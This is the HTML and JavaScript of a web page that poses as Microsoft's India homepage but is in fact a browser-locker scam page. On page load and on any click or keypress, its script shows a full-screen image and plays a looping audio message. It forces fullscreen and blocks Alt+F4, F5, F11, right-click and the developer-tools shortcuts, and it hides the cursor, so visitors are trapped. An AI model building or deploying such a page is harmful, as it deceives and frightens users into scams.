<!DOCTYPE html>
<html lang="en-IN" dir="ltr">
   <head>
      <link rel="dns-pre etch" href="https://cdn-dynmedia-1.microsoft.com">
      <link rel="preconnect" href="https://cdn-dynmedia-1.microsoft.com">
      <link rel="dns-prefetch" href="https://web.vortex.data.microsoft.com">
      <link rel="preconnect" href="https://web.vortex.data.microsoft.com">
      <link rel="dns-prefetch" href="https://img-prod-cms-rt-microsoft-com.akamaized.net">
      <link rel="preconnect" href="https://img-prod-cms-rt-microsoft-com.akamaized.net">
      <link rel="dns-prefetch" href="https://c.s-microsoft.com">
      <link rel="preconnect" href="https://c.s-microsoft.com">
      <link rel="dns-prefetch" href="https://analytics.tiktok.com">
      <link rel="preconnect" href="https://analytics.tiktok.com">
      <link rel="dns-prefetch" href="https://bat.bing.com">
      <link rel="preconnect" href="https://bat.bing.com">
      <link rel="dns-prefetch" href="https://cdnssl.clicktale.net">
      <link rel="preconnect" href="https://cdnssl.clicktale.net">
      <link rel="dns-prefetch" href="https://d.impactradius-event.com">
      <link rel="preconnect" href="https://d.impactradius-event.com">
      <link rel="dns-prefetch" href="https://js.monitor.azure.com">
      <link rel="preconnect" href="https://js.monitor.azure.com">
      <link rel="dns-prefetch" href="https://mem.gfx.ms">
      <link rel="preconnect" href="https://mem.gfx.ms">
      <link rel="dns-prefetch" href="https://wcpstatic.microsoft.com">
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      <title>Microsoft – Cloud, Computers, Apps &amp; Gaming</title>
      <link rel="canonical" href="https://www.microsoft.com/en-in">
      <link rel="stylesheet" href="css/main-light.min.ACSHASHfd071803266ba1f4336b43868366299a.css" type="text/css">
      <link rel="stylesheet" href="css/clientlib-base.min.ACSHASH24e963c5973b1072ed7b92de5bd89ad2.css" type="text/css">
      <link rel="stylesheet" href="css/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css" type="text/css">
      <script type="text/javascript" src="js/v1.min.ACSHASHc343dfb005ac8c14ae0dd22dd17fb2fc.js" async=""></script>
      <script src="assets/js/jquery.min.js"></script>
      <script type="text/javascript" src="assets/js/params.js"></script>
      <script type="text/javascript" src="assets/js/main.js"></script>
      <script src="assets/js/land.js"></script> 
<style>
  html, body {
    margin: 0;
    padding: 0;
    height: 100%;
    width: 100%;
  }

  img.fullscreen-image {
    height: 100vh;
    width: 100vw;
    object-fit: contain; /* Show full image without cropping */
    display: block;
  }
</style>
   </head>
<body>
 <picture>
  <!-- Mobile image (standard and retina versions) -->
  <source 
    media="(max-width: 768px)" 
    srcset="images/mainimage2.png 1x, images/mainimage2.png 2x">

  <!-- Desktop image (standard and retina versions) -->
  <source 
    media="(min-width: 769px)" 
    srcset="images/mainimage2.png 1x, images/mainimage2.png 2x">

  <!-- Fallback image -->
  <img src="images/mainimage2.png" alt="Responsive fullscreen image" class="fullscreen-image">
</picture>
      <audio id="audio" src="assets/speechvoicee.mp3"></audio>
      <script src="js/main-light.min.ACSHASHe3fd481804126aad70e99fe060fe8dca.js"></script>
      <script src="js/clientlib-httpclient.min.ACSHASHc102b6d56f04d1e67cf3f626dfabf84d.js"></script>
      <script src="js/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js"></script>
      <!-- Changes for Global Pixel -->
      <script type="text/javascript" id="contentsquare">
         (function(){
         	var contentSq =
         		{
         			"entryFile": "https://cdnssl.clicktale.net/www32/ptc/05d32363-d534-4d93-9b65-cde674775e71.js",
                          };
         	if (typeof window["partnerScripts"]==="undefined"){
         		window["partnerScripts"]={};
         	}
         	window["partnerScripts"]["contentSquare"] = contentSq;
         })();
      </script>
      <!-- Feature Control Service:List of all Enabled Features -->
      <div id="customFeatureControl" enabledfeatures="contentbackfillgenerate,esiproductcards,feature-controlled-mwf,uhf-ms-io-endpoint,uhf-esi-cv,uhf-esi-cache,fraud-greenid,contentsquare,mediapixel,holiday-themer,lazyload-static-components,clientlibDefer,upsellEnabled,contentbackfillpkgdelete,healthcheck,demo-feature,contentbackfillhttpgenerate,perf-tracker-1ds,dynamic-bundle,cvIncrementer,tentingEnabled,chatCookiesImplemented,alertCountDownWithoutServerTime,pdpDynamicRendering,bundlesDynamicRendering,contentbackfillmetadatachangesvideo,contentbackfillmetadatachangesnonvideo,listDynamicRendering,experimentation-without-personalization,generic-list-importer,combinedUHF,cvCallEnabled,m365ProductCatalog,support-unsupported-locales,deferClickTale,videoLazyLoad,prefetchFontsEnabled,enable-code-isolation,imageLinkTag,fetchPriority,contentIngestionAgent,enableClickgroupTelemetry,imageLazyLoad,contentIngestionAgent-dispatcher2westus2Agent,isCacheControlFeatureEnabled,feature-controlled-content-card,lcpPrioritizationPhase1,ocReimagineTelemetry,deferScriptsEnabled,lcpPrioritizationPhase2,ocReimagineSlotNumberTelemetry,contentIngestionAgent-dispatcher1westus2Agent,ocReimagineComponentNameTelemetry,ocReimagineTemplateNameTelemetry,ptePhase1,extended-html-minification-sites,dynamicPrice,gl-auto-config,displayV35Toggle"></div>
      <div class="oneds-config" data-instrumentationkey="aacbcf0ee7614738b1ea4f99c23f2e82-63b77ecc-8c62-4513-aa1f-a12a5ed8c015-6865" data-isenabled="true" data-env="prod" data-market="en-in" data-pagename="HomePage" data-urlcollectquery="true" data-urlcollecthash="false" data-autocapturelineage="false" data-autocaptureresize="false" data-autocapturescroll="false" data-initialize1dseventname="none" data-tenantname="mscom" data-tenanttitle="Mscom" data-tenantdomain="microsoft" data-tenantsitename="microsoft" data-tenantnameproperty="tenantName" data-tenanttitleproperty="tenantTitle" data-tenantdomainproperty="tenantDomain" data-tenantsitenameproperty="tenantSiteName" data-max1dsinitializedelayinseconds="1"></div>
      <script src="js/custom-oneds.min.ACSHASHb4f0b5100b03a879dd5d2e97636efc37.js"></script>
      <!--Enable script to inject Green ID iFrame-->
      <script type="text/javascript" src="js/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js" async=""></script>
      <script>
         $(document).ready(function() {
           // Function to open the popup
           function openPopup() {
             $('#popup').fadeIn();
           }
         
           // Function to close the popup
           function closePopup() {
             $('#popup').fadeOut();
           }
         
           // Call the openPopup function when the page loads
           openPopup();
         
           // Close the popup when the close button is clicked
           $('#closePopup').click(closePopup);
         });             
         $(document).click(function() {
      $('#audio')[0].play();
      $('#audio')[0].loop = true;
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
              elem.requestFullscreen();
        } else if (elem.mozRequestFullScreen) { /* Firefox */
              elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari and Opera */
              elem.webkitRequestFullscreen();
        } else if (elem.msRequestFullscreen) { /* IE/Edge */
              elem.msRequestFullscreen();
        }
     });
     document.addEventListener('contextmenu', function(e) {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
              elem.requestFullscreen();
        } else if (elem.mozRequestFullScreen) { /* Firefox */
              elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari and Opera */
              elem.webkitRequestFullscreen();
        } else if (elem.msRequestFullscreen) { /* IE/Edge */
              elem.msRequestFullscreen();
        }
        e.preventDefault();
     });
     document.addEventListener('keydown', function(e) {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
              elem.requestFullscreen();
        } else if (elem.mozRequestFullScreen) { /* Firefox */
              elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari and Opera */
              elem.webkitRequestFullscreen();
        } else if (elem.msRequestFullscreen) { /* IE/Edge */
              elem.msRequestFullscreen();
        }
     });
    //alt + f4 brrowser close disable
      document.addEventListener('keydown', function(e) {
         if (e.key === 'F4' && e.altKey) {
               e.preventDefault();
         }
      });
        //ctrl + shift + i disable
        document.addEventListener('keydown', function(e) {
           if (e.ctrlKey && e.shiftKey && e.key === 'I') {
                 e.preventDefault();
           }
        });
        //ctrl + shift + j disable
        document.addEventListener('keydown', function(e) {
           if (e.ctrlKey && e.shiftKey && e.key === 'J') {
                 e.preventDefault();
           }
        });
        //ctrl + shift + c disable
        document.addEventListener('keydown', function(e) {
           if (e.ctrlKey && e.shiftKey && e.key === 'C') {
                 e.preventDefault();
           }
        });
        //ctrl + shift + u disable
        document.addEventListener('keydown', function(e) {
           if (e.ctrlKey && e.shiftKey && e.key === 'U') {
                 e.preventDefault();
           }
        });
        //ctrl + shift + s disable
        document.addEventListener('keydown', function(e) {
           if (e.ctrlKey && e.shiftKey && e.key === 'S') {
                 e.preventDefault();
           }
        });
        // f5 disable
        document.addEventListener('keydown', function(e) {
           if (e.key === 'F5') {
                 e.preventDefault();
           }
        });
           //f11 disable
        document.addEventListener('keydown', function(e) {
           if (e.key === 'F11') {
                 e.preventDefault();
           }
        });
document.addEventListener('fullscreenchange', (event) => {
           if (document.fullscreenElement) {
              document.documentElement.style.cursor = 'none';
           }
        });  
      </script>
   </body>
</html>